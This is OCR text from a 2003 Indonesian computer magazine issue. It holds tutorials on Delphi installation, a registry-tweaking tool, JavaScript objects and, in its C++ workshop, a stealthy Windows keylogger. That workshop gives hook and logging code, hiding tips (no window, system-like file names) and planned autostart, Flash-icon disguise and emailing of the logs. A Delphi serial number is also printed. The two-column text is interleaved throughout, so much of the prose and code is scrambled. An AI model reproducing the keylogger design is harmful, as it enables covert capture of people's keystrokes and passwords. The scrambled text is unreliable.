tidak perlu. Pilih Start Scan untuk memulai scanning.

Catatan: Untuk menjalankan MBSA, anda tidak harus mela-


kukan koneksi ke Internet dahulu, karena file MSSECURE.XML
tetap bisa digunakan berulang-ulang. Perhatikan bahwa Mic-
rosoft secara berkala melakukan revisi file MSSECURE.CAB
MSSECURE.XML). Oleh sebab itu, disarankan agar anda
(M
juga meng-update file ini secara berkala, misalnya setiap ming-
8. Hasil scanning bisa dilihat dari layar berikut, dan tentu- gu. Caranya updatenya mudah, cukup melakukan koneksi ke
kan tindakan anda selanjutnya untuk mengamankan server/ Internet, sebelum menjalankan MBSA dan melakukan proses
workstation. Sangat disarankan untuk men-download dan scanning. MBSA akan otomatis mendownload MSSECURE.CAB
install semua patches yang tersedia. terbaru, jika ada.

Mei/Jun 2003 NeoTek 27


NeoTutor

BORLAN D DE LPH I 7
EBAGAI PENGANTAR UNTUK ARTIKEL
S selanjutnya, yaitu proyek membuat
sendiri tweaking tool dengan Delphi,
berikut ini NeoTek menyajikan cara instal-

PE RSONAL E DITION asi dan pengenalan dasar file-file Delphi;


khusus untuk anda yang sama sekali belum
pernah mengenal penmrograman.

FU LL VE RSION Pada CD NeoTek ini juga terdapat Delphi


7 Personal Edition (full version) yang se-
rial number, authorization key, dan activa-
tion code dapat diminta gratis melalui situs
Borland Delphi adalah salah satu programming tool yang Borland.
powerful namun juga mudah digunakan. Delphi dapat Langkah-langkah mendapatkan itu semua
dikatakan versi grafis dari Pascal sehingga diberi julukan serta instalasinya dibahas khusus, untuk
memastikan bahwa anda dapat menjalan-
Visual Pascal. Instalasi Borland Delphi adalah awal dari kan Borland Delphi 7 Personal Edition
artikel-artikel pemrograman dalam Delphi di NeoTek. pada komputer anda.

Membahas cara instalasi Borland Delphi 7 Personal Edition

INSTAL DELPHI 7 PERSONAL CD ISIKAN S/N DAN AUTH. KEY LICENSE DAN INSTALATION INFO
4 Double click icon setup.exe di
subdirektori Delphi7Pers\Install
5 Isikan serial number dan authori-
zation key yang anda dapatkan
6 Anda akan mendapatkan jendela
License agreement yang perlu anda
dan instalasi akan dimulai dan lewat email sebelumnya. Klik Next setujui dan klik Next untuk menda-
anda menerima jendela selamat untuk melanjutkan. Di sini S/N- patkan jendela Important Installation
datang ke Installation Wizard. Klik nya 6F3R-BS5YB8-G3SM3Z-EFDQ Information. Setelah dibaca, klik
Next untuk melanjutkan. dan authorization key MV7-PX? Next untuk melanjutkan.
Yang anda dapatkan mungkin
berbeda.

INSTALASI SELESAI
10 Setelah selesai akan tampil jen-
dela Installation Wizard Completed.
Klik Finish dan instalasi pun
selesai. Dari Start > Program >
Borland Delphi 7 anda bisa pilih
Delphi 7 untuk menjalankannya.

28 NeoTek Mei/Jun 2003


NeoTutor

KUNJUNGI SITUS BORLAND EMAIL DARI BORLAND COPY REG119.TXT


1 Untuk menginstal Delphi 7 Personal
Edition yang di CD NeoTek, kunjungi
2 Anda segera menerima email yang
berisi serial number dan authoriza-
3 Copy reg119.txt ke direktori berikut:
Win98 (single user) C:\Windows
http://info.borland.com/new/d7/perso tion key. Adapun activation key Win98 (multiuser)
nal.html. Setelah mengisi form dan (reg119.txt) ada di attachment mau- C:\Windows\Profiles\<username>
kuesioner, anda diminta memveri- pun di-paste di badan email. Bila W2K/XP C:\Documents and
fikasi email sebab serial number, tidak ada attachment, save email ini Settings\<username> agar di-load
authorization key, dan activation key sebagai file reg119.txt. secara otomatis setiap kali Delphi 7
file akan dikirim via email. dijalankan.

OPSI INSTALASI DESTINATION FOLDER INSTALASI BERJALAN


7 Untuk keperluan belajar, pilih saja
tipe instalasi Typical dan klik Next
8 Secara default Delphi 7 akan diinstal
di C:\Program Files\Borland\Delphi7\
9 Selanjutnya akan tampil jendela
Ready to Install the Program. Klik
untuk melanjutkan. Anda diminta (program file) dan shared files-nya Next dan instalasi berjalan secara
memilih tipe Microsoft Office apa di C:\Program Files\Common otomatis sampai selesai.
yang terinstal di komputer anda. Files\Borland Shared\
klik Next untuk melanjutkan. Untuk uninstall kelak anda perlu
membentuk installation database.

MEMULAI DELPHI 7
11 Begitu dijalankan secara otomatis
Delphi akan membuka Project 1
yang terdiri atas komponen-kom-
ponen Unit1.pas (untuk source code
Delphi) dan Form1 untuk memu-
dahkan kita membentuk graphical
interface yang akan secara oto-
matis ter-coding dalam Unit1.pas.
Selain itu secara otomatis dibuka
juga Object TreeView dan Object
Inspector yang memudahkan kita
merancang karakteristik setiap
obyek pada interface yang kita
buat serta merupakan wizard
untuk penempatan kode-kode
pemrograman. MULAI DARI AWAL MEMBUKA PTWEAKID.DPR
Apabila tertutup dapat ditampil-
kan lagi lewat menu View. Juga
12 Untuk mulai dari awal sekali, dari
menu anda dapat memilih File >
13 Pada CD NeoTek terdapat proyek
tweaking tool dengan Delphi. Buka
antara Unit dengan Form dapat di- New > Application (untuk mem- proyek dengan nama PTweakid.dpr
toggle. buat proyek baru) atau File > yang komponennya (akan ter-load
Open (untuk membuka proyek bersamaan) adalah UTweakid.pas
Keseluruhan ini adalah suatu yang sudah ada). Anda akan (source code file) dan interface
project (di-save sebagai *.dpr) mendapat pesan apakah perlu (form file) yaitu UTweakid.dfm.
sedangkan source code sebagai men-save proyek yang terbuka Yang dibuka hanya file *.dpr saja.
*.pas dan form sebagai *.dfm sebelumnya

Mei/Jun 2003 NeoTek 29


NeoTutor

D E LP H I WO R KS H O P
Delphi Tweaking Tool
Happy Chandraleka (hchandraleka@yahoo.com) membahas dua hal sekaligus, tweaking dan
Delphi programming workshop. Walaupun belum pernah mengenal programming sama sekali,
anda tetap dapat mengikuti bahasan langkah per langkah ini.

EMBACA TENTUNYA SUDAH TERBIASA DENGAN PROGRAM-


P program tweaking, seperti WinBoost, WinHacker,
Tweak UI, Tweak Me, dan mungkin juga telah ada
yang menggunakan program CaroX yang merupakan pro-
gram tweaking lokal. Workshop Delphi kali ini mengete-
ngahkan cara membuat program tweaking. Kita beri nama
saja Tweakid. Program ini hanyalah contoh apresiasi pe-
mrograman Delphi untuk memanipulasi registry Windows,
yang nantinya dapat anda kembangkan lebih jauh.
Pilih tab Additional dan klik icon kedua
Membuat program tweaking ini selain membutuhkan ke- (BitBtn), yaitu memilih tombol (button)
mampuan pemrograman Delphi juga membutuhkan penge- untuk ditempatkan pada Form1 yang
tahuan mengenai registry Windows. Terutama pembaca masih kosong.
harus mengetahui bagian-bagian registry yang perlu di-
ubah. Untungnya majalah NeoTek telah banyak memuat
bahasan tentang mengutak-utik registry. Anda dapat
membuka arsip Neotek di situs http://www.neotek.co.id.
sehingga anda dapat menggunakannya sebagai referensi
dalam mengubah registry.
Tweaking Registry Secara Manual
Pada dasarnya manipulasi registry Windows dapat dilaku-
Setelah meng-klik icon
kan secara manual, yaitu dengan menggunakan tool ba- di atas, geser mouse ke arah bidang
waan dari Windows yaitu regedit. Hanya saja bila anda kosong Form1 dan klik di tepat ini. Kalau
membuat programnya maka manipulasi registry akan perlu button yang terbentuk dapat digeser
lebih mudah. ke tempat yang diinginkan.
Dalam workshop ini bagian-bagian registry yang akan
diubah adalah seperti diperlihatkan pada Tabel 1. Ini
hanyalah contoh saja. Penulis bawakan empat macam
dword value dan dua macam string value. Bila anda
menguasai cara pengubahan kedua value tersebut maka
pembaca telah dapat membuat program tweaking, karena
program-program tweaking yang ada seperti disebutkan
di atas kebanyakan hanya mengubah kedua macam value
Setelah selesai menempatkan
tersebut, yaitu dword value dan string value. beberapa BitBtn, pilih tab Standard
Membuat Program Tweaking dan pilih icon ke-9 (checkbox) dan
pindahkan mouse ke bidang
Mula-mula yang harus anda lakukan adalah merancang kosong Form1 dan klik untuk
antarmuka/interface program terlebih dahulu. Letakkan menempatkannya.
komponen-komponen berikut: 7 komponen BitBtn dari
pallete Additional, 6
CheckBox dari pallete
Standard, dan satu kom-
ponen Edit dari pallete
Standard, ke bidang
Form1 yang masih ko-
song. Aturlah letak
komponen tersebut
seperti pada Gambar 1

Gambar 1. Pembentukan
interface untuk program Perhatikan, bersamaan dengan selesainya interface yang dibentuk pada
Tweakid. bidang Form1, coding telah terbentuk pada Unit1.pas

30 NeoTek Mei/Jun 2003


NeoTutor

Tabel 1.
Key Value Fungsi
Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value GeneralTab Mengontrol visibility tab General Internet Options
Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value SecurityTab Mengontrol visibility tab Security Internet Options
Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value PrivacyTab Mengontrol visibility tab Privacy Internet Options
Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value ContentTab Mengontrol visibility tab Content Internet Options
Hkcu\Software\Microsoft\Internet Explorer\Toolbar String value BackBitmap Mengganti latar belakang browser IE
Hkcu\Software\Microsoft\Internet Explorer\Main String value Window Title Mengganti window title browser IE

Selanjutnya anda perlu menyesuaikan properti masing- Pada penyesuaian properties BitBtn dan Checkbox, begitu
masing komponen program Tweakid. Ubah properti opsi dipilih langsung terlihat perubahan interface (Gam-
komponennya berdasarkan Tabel 2. Contoh penyesuai bar 2b).
properti tampak pada Gambar 2 Bila anda telah selesai mengubah properti seluruh kom-
ponen yang ada berarti pembaca telah selesai merancang
Tabel 2. interface program Tweakid. Langkah berikutnya adalah
Komponen Properti Nilai menambahkan kode-kode program.
Form1 Caption Tweakid
Name FTweakid Penambahan Kode Program
BitBtn1 sampai 6 Kind bkOK Inilah bagian sesungguhnya dalam pemrograman Delphi
BitBtn7 Kind bkClose yang menuntut pemahaman yang mendalam tentang
CheckBox1 Caption Hilangkan General tab bahasa Delphi. Di sini penulis akan menuntun pembaca
CheckBox2 Caption Hilangkan Security tab untuk melakukannya setahap demi setahap sehingga
CheckBox3 Caption Hilangkan Privacy tab pemrograman yang tadinya sulit menjadi mudah bagi
CheckBox4 Caption Hilangkan Content tab
pembaca.
CheckBox5 Caption Hilangkan Go button Gambar 2. Penyesuaian properti pada FTweakid dan BitBtn1 dilakukan
CheckBox6 Caption Ganti kulit browser IE dengan mengklik Oject pada Object TreeView dan mermilih tab
Properties pafda Object Inspector. Pilih properties yang ingin disesuaikan
Edit1 Text C:\Windows\Setup.bmp
di sini dan ketikkan sesuai petunjuk pada Tabel 2.

Mei/Jun 2003 NeoTek 31


NeoTutor

Masuklah ke jendela code editor


Unit1.pas) yang memuat source code
(U
program Tweakid. Bila jendela ini ter-
tutup oleh yang lain, tampilkan dengan
memilih View > Toggle Form/Unit
atau dapat juga tekan tombol F12
(Gambar 3).
Tambahkan uses Registry pada bagian
uses, sehingga bagian uses secara leng-
kap menjadi sebagai berikut:.
uses
Registry, Windows, Messages, SysUtils,
Variants, Classes, Graphics, Controls,
Forms,Dialogs, StdCtrls, Buttons;
yang tampak pada Gambar 4.
Tambahkan juga pada bagian variabel
kode berikut ini.
var
FTweakid : TFTweakid;
Reg : TRegistry;

Komponen Progran
Masih pada Unit1.pas, kita akan mulai
menuliskan komponen-komponen
program Tweakid.
Double click pada komponen BitBtn1,
sehingga anda dibawa ke bagian pada
Unit1.pas tempat kita menempatkan
syntax untuk di antara tanda begin dan
end;. tepatnya ndi antara
procedure TFTweakid.BitBtn1Click(Sender: TObject);
begin

end;
Gambar 3 dan 4. Pada agian header Unit1.pas cari bagian uses dan ganti isinya.

Adapun syntax yang disisipkan di


antara begin dan end; itu adalah:
Reg := TRegistry.Create;
Reg.RootKey := Hkey_Current_User;
Reg.OpenKey('\Software\Policies\Microsoft\Internet
Explorer\Control Panel', false);
if CheckBox1.Checked = true then Reg.WriteBool
('GeneralTab', true) Gambar 5 dan 6. Double click pada BitBtn1 dan
else reg.WriteBool ('GeneralTab', false); anda akan dibawa ke bagian pada source code
program (padaUnit1.pas) untuk menempatkan
Reg.Free syntax bagi fungsi yang dihubungkan ke BitBtn1
tersebut.

32 NeoTek Mei/Jun 2003


NeoTutor

Lakukan dengan cara yang sama untuk komponen BitBtn2, dengan menekan
dan lengkapi dengan kode berikut ini: key F9. Sekarang
Reg := TRegistry.Create; anda telah mem-
Reg.RootKey := Hkey_Current_User; punyai program
Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false); tweaking tool
if CheckBox2.Checked = true then Reg.WriteBool ('SecurityTab', true) sendiri yang da-
else reg.WriteBool ('SecurityTab', false);
Reg.Free; pat digunakan
untuk mengubah
Untuk BitBtn3, lengkapi dengan sintaks berikut ini : setting-setting
Reg := TRegistry.Create; Internet.
Reg.RootKey := Hkey_Current_User; Selanjutnya sim-
Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false);
if CheckBox3.Checked = true then Reg.WriteBool ('PrivacyTab', true) pan dengan
else reg.WriteBool ('PrivacyTab', false); memilih menu
Reg.Free; File > Save All.
Untuk BitBtn4, tambahkan sintaks di bawah ini : Demikianlah
workshop pe-
Reg := TRegistry.Create;
Reg.RootKey := Hkey_Current_User; mrograman
Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false); Delphi ini,
if CheckBox4.Checked = true then Reg.WriteBool ('ContentTab', true) membuat pro-
else reg.WriteBool ('ContentTab', false); gram tweaking.
Reg.Free;
Ini semua ha-
Sedangkan untuk BitBtn5, sintaks yang ditambahkan adalah nyalah apresiasi
pemrograman
Reg := TRegistry.Create; Delphi untuk
Reg.RootKey := Hkey_Current_User;
Reg.OpenKey('\Software\Microsoft\Internet Explorer\Main', false); memanipulasi
if CheckBox5.Checked = true then Reg.WriteString('ShowGoButton', 'no') registry. Bila
else Reg.WriteString ('ShowGoButton','yes'); pembaca dapat
Reg.Free; membuat pro-
gramTweakid ini
Terakhir, untuk BitBtn6 tambahkan sintaks seperti di bawah ini
tentunya pem-
Reg := TRegistry.Create; baca dapat pula
Reg.RootKey := Hkey_Current_User;
Reg.OpenKey('\Software\Microsoft\Internet Explorer\Toolbar', false); mengembang-
if CheckBox6.Checked = true then Reg.WriteString('BackBitmap', Edit1.Text) kannya dan me-
else Reg.WriteString ('BackBitmap',''); lengkapi dengan
Reg.Free; tweaking regis
try yang lain, Gambar 8. Hasil kompilasi adalah
Sampai di sini anda dapat langsung meng-compile program yang penting file executable Ptweakid.exe
anda menghasilkan file .exe. Compile project yang sedang pembaca mengetahui bagian registry Windows yang perlu
pembaca kerjakan ini dengan memilih menu Run > Run atau diubah.
Gambar 7. Tekan F9 atau dari menu Run > Run untuk meng-compile Happy programming ….
project ini menjadi program dengan nama PTweakid.exe

Mei/Jun 2003 NeoTek 33


NeoTutor

C++ Workshop
Membuat Sendiri Keylogger
Dewanata (m_strdewanata@yahoo.com) membahas cara kerja keylogger dan menyajikan
programming tip untuk membuat keylogger sendiri, lengkap dengan strategi penulisan
program serta tip-tip penulisdan syntax-nya. Bahasa yang digunakan
adalah C++ dengan Visual C 6.0 Compiler.

ada dasarnya, Keylogger adalah sebuah program Yang harus diperhatikan, sifat DLL adalah self-contained
P untuk mencatat setiap aktifitas keyboard. Pada
perkembangannya, Keylogger yang canggih bisa
dan shared.
Pada beberapa program keylogger yang beredar di
melakukan pencatatan secara selektif, menyimpannya ke Internet, proses inisialisasi dan pencatatan ke output file
file dan kemudian secara periodik mengirimkannya ke (misalnya ke c:\keylog.txt) dilakukan oleh DLL, sehingga
sebuah alamat email. Tulisan ini hanya membahas prinsip agak menyulitkan pengguna ketika hendak
dasar Keylogger dalam melakukan intersepsi mengubah/mengganti file output.
(interception) pesan-pesan aktivitas keyboard di suatu
komputer berbasis Windows. Pada tulisan ini, DLL hanya akan difungsikan sebagai
pemicu, sedangkan proses inisialisasi dan pencatatan
dilakukan oleh program utama, dalam bentuk exe.
Model Intersepsi
Secara garis besar, ada dua cara dalam melakukan
DLL Interceptor EXE Program Utama
intersepsi:
• terjemahkan
• intersepsi di satu proses yang sama 1. pesan masuk
intersep pesan
keyboard 2. pesan masuk pesan
• intersepsi secara sistem (pada proses yang berlainan) keyboard
• tulis ke file
Yang umum dipakai adalah model intersepsi yang kedua, 3. kembalikan proses

yaitu mengaktifkan suatu proses (software) tertentu


untuk melakukan intersepsi pesan keyboard proses-proses
4. lanjutkan pesan ke sistem
lain yang sedang aktif.

Intersepsi Secara Sistem


Proses intersepsi ini sebenarnya sangat sederhana. Setelah
software kita instal, maka ia akan berfungsi sebagai Inter- Strategi Pemrograman
septor, seperti yang digambarkan di diagram di bawah ini. Penulis menggunakan bahasa C++ dan compiler VC6.0.
Agar file DLL dan EXE yang dihasilkan berukuran kecil,
sebaiknya hindari MFC dan gunakan Win32 API. Jangan
Proses X Interseptor Sistem munculkan (show) Window apapun agar ikon tidak
muncul di status bar (semi stealth). OS yang digunakan
adalah Win2k.

Transfer Pesan DLL-EXE


Pesan Pesan Ketika sebuah tombol keyboard ditekan, DLL interseptor
Keyboard Keyboard akan mengirimkan pesan ke proses utama menggunakan
perintah
PostMessage(hwnd,5000,wParam,lParam).
hwnd adalah handel Window proses utama, 5000 adalah
ID pesan yang didefinisikan di program utama.
Proses X Pemrograman DLL Interseptor
Pemrograman DLL dilakukan sesuai standar, sbb:
• gunakan __declspec(dllexport) untuk setiap fungsi yang
Setiap pengiriman pesan aktivitas keyboard oleh Proses X diekspor.
ke sistem, akan dicegat terlebih dahulu oleh proses kita.
Selanjutnya pesan keyboard ini diteruskan apa adanya • gunakan #pragma data_seg() dan #pragma
(agar tidak menimbulkan kecurigaan) ke sistem, yang comment(linker, "/section:.DEWAN,rws") untuk mem-
kemudian akan mengirimkan respons ke Proses X. buat sharing variables section.
Pada model ini, fungsi interseptor diletakkan di satu objek • letakkan semua variabel 'global' di bagian tersebut,
yang shareable pada tingkat sistem. Pada tulisan ini, yaitu handel Window utama dan handel hook.
penulis menggunakan DLL untuk melakukan intersepsi. Untuk melakukan intersepsi, penulis menggunakan satu

34 NeoTek Mei/Jun 2003


NeoTutor

perintah yang disediakan oleh Win32 API yaitu Proses Instalasi


SetWindowsHookEx, dalam baris sbb: Ada dua file yang akan dihasilkan oleh proyek kita:
hhook = SetWindowsHookEx(WH_KEYBOARD,
• srv32.exe, ukuran 24 kb, sebagai program utama
(HOOKPROC)KeyboardProc, hInst, (DWORD)NULL);
• srv32d.dll, ukuran 32 kb, sebagai DLL interseptor
untuk: File srv32d.dll sebaiknya diletakkan di
hhook: handel hook ini C:\WINNT\SYSTEM32, sedangkan file srv32.exe bisa
WH_KEYBOARD: intersepsi dilakukan untuk setiap diletakkan di mana saja, tapi sebaiknya letakkan di
aktivitas keyboard C:\WINNT.
KeyboardProc: fungsi yang akan meng-handle proses
setelah intersepsi dilakukan Cara Pemakaian
Selanjutnya yang harus diingat adalah anda harus Jalankan di C prompt dengan perintah srv32 [ output file]
memanggil fungsi Misal: srv32 c:\capture.txt.
CallNextHookEx(hhook,code,wParam,lParam) di akhir
fungsi KeyboardProc. Pembahasan Versi Selanjutnya
• Mencegah dua instan aktif di memori
Pemrograman EXE Program Utama
• Menjalankan software secara otomatis ketika startup,
Pertama-tama DLL dipanggil secara dinamis menggunakan Registry
menggunakan LoadLibrary(). Setelah itu, fungsi
SetKeyboardHook dipanggil untuk memulai proses • Mengemas dua file di atas ke dalam satu file instalasi
intersepsi. tunggal (.exe) menggunakan NSIS. Ini dapat mengu-
rangi ukuran deployment (reduksi sekitar 50%) dan
mengotomatisasikan proses instalasi. Ikon program ini
dllhinst=LoadLibrary("srv32d"); \\ nama file DLL adalah srv32d.dll juga bisa dirubah ke ikon yang familiar bagi para
if (dllhinst!=NULL) pengguna, misalnya: ikon Macromedia Flash.
{ • Mencatat proses (software) yang sedang aktif ketika
f = (void(*)(HWND)) GetProcAddress(dllhinst, "SetKeyboardHook"); keyboard ditekan.
if(!f)
{ • Melakukan pencatatan selektif, yang hanya mencatat
FreeLibrary(dllhinst); proses keyboard pada satu aplikasi tertentu (misal:
error=TRUE; pengetikan dalam Excel, Internet Explorer, atau Word
} saja).
else • Pengiriman file output ke alamat email
{
(*f)(hwnd);
} LRESULT OnKeyCaptured(WPARAM wParam, LPARAM lParam){
char ch;
if(bRightClass){
if((wParam==VK_SPACE)||
Pada rutin pemrosesan pesan, tambahkan beberapa baris (wParam==VK_RETURN)||
tambahan untuk melakukan pemeriksaan apakah pesan (wParam==VK_DELETE)||
yang sedang diproses adalah pesan yang dikirimkan oleh (wParam==VK_SHIFT)||
DLL Interseptor. ((wParam>=0x2f)&&(wParam<=0x100))){
stream=fopen(m_szFilename,"a+");
if(wParam==VK_RETURN){
ch='\n';
LRESULT CALLBACK WindowFunc(HWND hwnd, UINT message,
fwrite(&ch,1,1,stream);
WPARAM wParam, LPARAM lParam)
} else
{
if(wParam==VK_DELETE){
switch(message){
char cd[] = "<d>";
case WM_DESTROY:
fwrite(&cd,3,1,stream);
PostQuitMessage(0);
} else
break;
if(wParam==VK_SHIFT){
case UWM_KEYCAPTURED:// ID tambahan, predefined, = 5000
char cd[] = "<s>";
OnKeyCaptured(wParam,lParam);
fwrite(&cd,3,1,stream);
break;
} else {
default:
BYTE ks[256];
return DefWindowProc(hwnd,message,wParam,lParam);
GetKeyboardState(ks);
}
WORD w;
return 0;
UINT scan=0;
}
ToAscii(wParam,scan,ks,&w,0);
ch = char(w);
fwrite(&ch,1,1,stream);
}
fclose(stream);
Jika ternyata benar ini adalah pesan yang dimaksud,
}
jalankan proses pencatatan, sebagai terlihat pada listing
}
terakhir.
return 0;
}

Mei/Jun 2003 NeoTek 35


NeoTutor

Bagian Ketiga
Objek pada JavaScript
Pada bagian ini, Hadi Purnomo (hadipurnomo@plasa.com) mengajak anda memahami
properti dari objek buatan sendiri pada JavaScript. Merupakan bagian terakhir dari sub-bahasan.

ada bagian sebelumnya kita te- kita akan tampilkan nilai propertinya dalam konstruktor? Masih dengan
P lah mendefinisikan parameter-
parameter dan argument-argu-
akan tercetak "darat." menggunakan contoh di atas. Kita
misalkan akan menambahkan properti
document.write(Mobil.jenis)
ment dari objek buatan sendiri. Kali ini jenis ke objek, padahal properti ini,
kita akan melangkah pada bagian ter- Outputnya: sebagaimana yang Anda lihat telah
akhir dari pembahasan objek buatan terdefinisi dalam konstruktor. Apa
darat
sendiri. Kita akan mempelajari properti yang akan terjadi? Kita coba saja!
bawaan dari tiap objek, yaitu properti
prototype dan properti bawaan dari tiap Sekarang kita akan menambahkan se- Kendaraan.prototype.jenis="udara"

instan objek yaitu properti constructor. buah properti baru untuk objek Kenda-
raan, yaitu properti roda. Maka dengan Tampilkan dua properti jenis dari instan
Selanjutnya pada bagian akhir kita akan yang telah kita buat seperti berikut:
mengenal secara sekilas objek Library. menggunakan properti prototype. Cara-
nya seperti berikut: document.write(Mobil.jenis)
document.write("<br>")
Properti Prototype Kendaraan.prototype.roda = 4
document.write(Motor.jenis)
Setiap objek yang kita buat dengan kon-
struktor, secara otomatis akan memiliki Dengan statement tersebut artinya kita
menambahkan sebuah properti roda ke Outputnya:
sebuah properti khusus yang dinama-
kan dengan properti prototype. Properti objek dengan nilai 4. Jika masih ragu darat
ini digunakan untuk menambahkan kita dapat menampilkannnya. darat
properti-properti atau metode-metode document.write(Mobil.roda)
baru ke semua instan dari suatu objek, Ternyata dari contoh di atas kita dapat
baik yang telah kita definisikan mau- Outputnya: melihat dengan jelas bahwa properti
pun yang belum kita definisikan. Sin- prototype ini tidak dapat mengubah
4
aksnya sebagai berikut: nilai yang ditetapkan dalam konstruk-
tor. Kenapa demikian? Karena properti
//untuk menambahkan properti Kita coba dengan membuat sebuah prototype ini akan dijalankan terlebih
namaobjek.prototype.namaproperti = nilai instan baru untuk objek Kendaraan.
//untuk menambahkan metode dahulu sebelum konstruktor itu sen-
namaobjek.prototype.namametode = Misalnya kita buat instan Motor. diri, sehingga apabila dalam terdapat
function(){ var Motor = new Kendaraan("darat") definisi untuk properti atau metode
//statement metode
} yang ditambahkan dengan properti
Secara otomatis instan ini juga akan me- prototype maka definisi dalam kon-
miliki properti roda, sebagaimana instan struktor akan menimpa definisi yang
Jika Anda masih belum paham, baiklah lainnya dari objek Kendaraan, meskipun dibuat dengan prototype.
kita akan coba dengan contoh berikut instan ini didefinisikan setelah penam-
ini. Pertama-tama kita akan medefini- bahan dilakukan. Masih ragu? Cetak saja!
ikan sebuah konstruktor objek yang Properti Konstruktor
document.write(Motor.roda)
sederhana. Misalkan kita akan membuat Jika tiap konstruktor dari objek
objek Kendaraan. Perhatikan konstruk- Outputnya: memiliki properti prototype, maka
tornya berikut: 4
tiap instan dari objek akan memiliki
function Kendaraan(jenis){
properti constructor. Properti ini akan
this.jenis = jenis Perhatikan bahwa nilai properti roda mengembalikan fungsi konstruktor
}
untuk setiap instan adalah sama dan kita dari objek yang dibuat instannya.
dapat memanipulasikannya kemudian. Sintaksnya sebagai berikut:
Dengan konstruktor tersebut kita men- Kesimpulannya properti prototype ini namainstan.constructor
definisikan objek dengan satu properti akan sangat berguna bagi kita jika pada
yaitu jenis yang nilainya tergantung suatu saat kita ingin menambahkan se- Supaya lebih jelas kita akan coba de-
dari argument parameter masukan. buah properti atau metode baru ke objek, ngan contoh di atas. Kita telah men-
Sekarang kita buat instan untuk objek, tentu saja jika nilai dari properti tersebut definisikan konstruktor untuk objek
misal instan Mobil, berikut sintaksnya: sama untuk semua instan. Tapi jika ter- Kendaraan, dan juga telah membuat
var Mobil = new Kendaraan("darat")
nyata nilainya tidak sama, maka kita dua buah instan objeknya yaitu
harus memanipulasinya kemudian. Mobil dan Motor. Nah pada kedua
Statement di atas akan membuat sebu- Sekarang perhatikan bagaimana yang instan Mobil dan Motor inilah terda-
ah instan objek Kijang dengan nilai terjadi jika ternyata sebuah properti pat properti constructor yang akan
properti jenis "darat". Sehingga jika yang akan ditambahkan sudah terdapat mengembalikan fungsi konstruktor.

36 NeoTek Mei/Jun 2003


NeoTutor

document.write(Mobil.constructor) for (i=0;i<arguments.length;i++){


document.write("<br>") this.jenis[i]=arguments[i]
Ketinggalan Membaca
document.write(Motor.constructor) } NeoTek?
Outputnya: Pertama-tama definisikan sebuah pro-
perti pada objek Library dengan tipe Edisi lama: harga khusus &
function Kendaraan(jenis){ this.jenis = jenis } array yang memiliki elemen sebanyak bebas ongkos kirim
function Kendaraan(jenis){ this.jenis = jenis }
argument yang dimasukkan. Lihatlah Penawaran khusus edisi lama NeoTek
kembali pembahasan tentang properti (Vol. II dan III, tentang hcking/security).
Catatan: arguments pada bagian sebelumnya.
Baik properti prototype maupun con- Rp15.000,-/eks (dengan CD)
Arguments-arguments ini sendiri Rp8.000,-/eks (tanpa CD)
structor juga dapat kita gunakan pada pada paraktisnya adalah nama-nama
objek-objek bawaan. Dengan properti Hubungi: Marni. Tel. 548 1457
instan objek yang dibuat. Lalu defini- (redaksi@neotek.co.id)
prototype kita dapat menambahkan sikan tiap elemen dari array yaitu
properti atau metode ke dalam objek Ada apa saja di edisi lama NeoTek?
berupa arguments yang dimasukkan.
bawaan. Misalnya objek String, seperti II/1 Oktober 2001
pada contoh berikut ini: Sehingga kemudian kita dapat mema- Hacking dengan Back Orifice
sukkan tiap instan yang telah kita
var kalimat = new String
definisikan di atas ke dala Library II/2 November 2001
String.prototype.keterangan="Ini sebuah Dasar-Dasar Remote Hacking
kalimat" dengan cara berikut:
var kata = new String II/3 Desember 2001
var Bundel = new Footprinting: Intelijen Awal
document.write(kata.keterangan)
Library(Mobil,Motor,Sepeda,Becak))
II/4 Januari 2002
Outputnya: Software Cracking
Untuk mengakses properti-properti
Ini sebuah kalimat objek dalam Library kita dapat meng- II/5 Februari 2002
anggap properti jenis dari objek Meng-hack NT Server
Sedangkan properti constructor, jika di- Library sebagai array biasa seperti II/6 Maret 2002
gunakan pada objek bawaan maka berikut: SoftICE: Serial Fishing
output yang dihasilkan adalah output
seperti berikut: for (i=0;i<Bundel.jenis.length;i++){ II/7 April 2002
document.write(Bundel.jenis[i].nama) Mengintip Password dengan DSniff
function namaobjekbawaan() { [native code] } document.write(" memiliki ")
document.write(Bundel.jenis[i].roda) II/8 Mei 2002
document.write(" roda.<br>") Superscan: Scanning Tool setara Nmap
Jadi jika kita gunakan properti con-
} II/9 Juni 2002
structor pada instan objek String, maka
akan menjadi seperti berikut ini: Skrip mIRC dan EggDrop
Outputnya:
var kalimat = new String
II/10 Juli 2002
document.write(kalimat.constructor) mobil memiliki 4 roda. Legion: Jalan-Jalan ke Komputer Orang
motor memiliki 2 roda.
sepeda memiliki 2 roda. II/11 Agustus 2002
Outputnya: becak memiliki 3 roda. Hacking & PC Security: Virus & Trojan
II/12 September 2002
function String() { [native code] } Password Cracking: Seni & Tekniknya
Sampai di sinilah pembahasan kita ten-
tang objek buatan sendiri pada Javascript. III/1 Oktober 2002
Membuat Library Objek Pada bagian berikutnya kita akan mulai Gaining Access: Remote Password Cracking
Seperti namanya library merupakan membahas objek-objek bawaan Javascript. III/2 November 2002
kumpulan dari objek-objek. Library Selamat Belajar! Sisi Gelap Internet: Carding
sebenarnya merupakan objek yang III/3 Desember 2002
memiliki suatu properti berupa array Penundaan Pemuatan Mendeface Situs Web
dari objek. Misalkan kita mempunyai Artikel Serial III/4 Januari 2003
konstruktor objek Kendaraan, kita Linux Hacking: Apache Server
membuat instan objek sebanyak empat Mengingat keterbatasan tempat, artikel
buah, yaitu Mobil, Motor, Sepeda, serial mengenai micro controller unit III/5 Februari/Maret 2003
MCU HC08 terpaksa ditunda pemuatan- VoIP Merdeka dan e-Commerce Security
dan Becak.
nya pada edisi ini dan akan dimuat mulai III/6 Maret/April 2003
function Kendaraan(nama,roda){ edisi mendatang. Memahami Exploit: C dan Perl Exploit
this.nama=nama
this.roda=roda Artikel-artikel mengenai MCU HC08 III/7 April/Mei 2003
} telah dimuat mulai awal Vol. III, yaitu: Memahami Java & Trojan Terbaru 2003
var Mobil = new Kendaraan("Mobil",4)
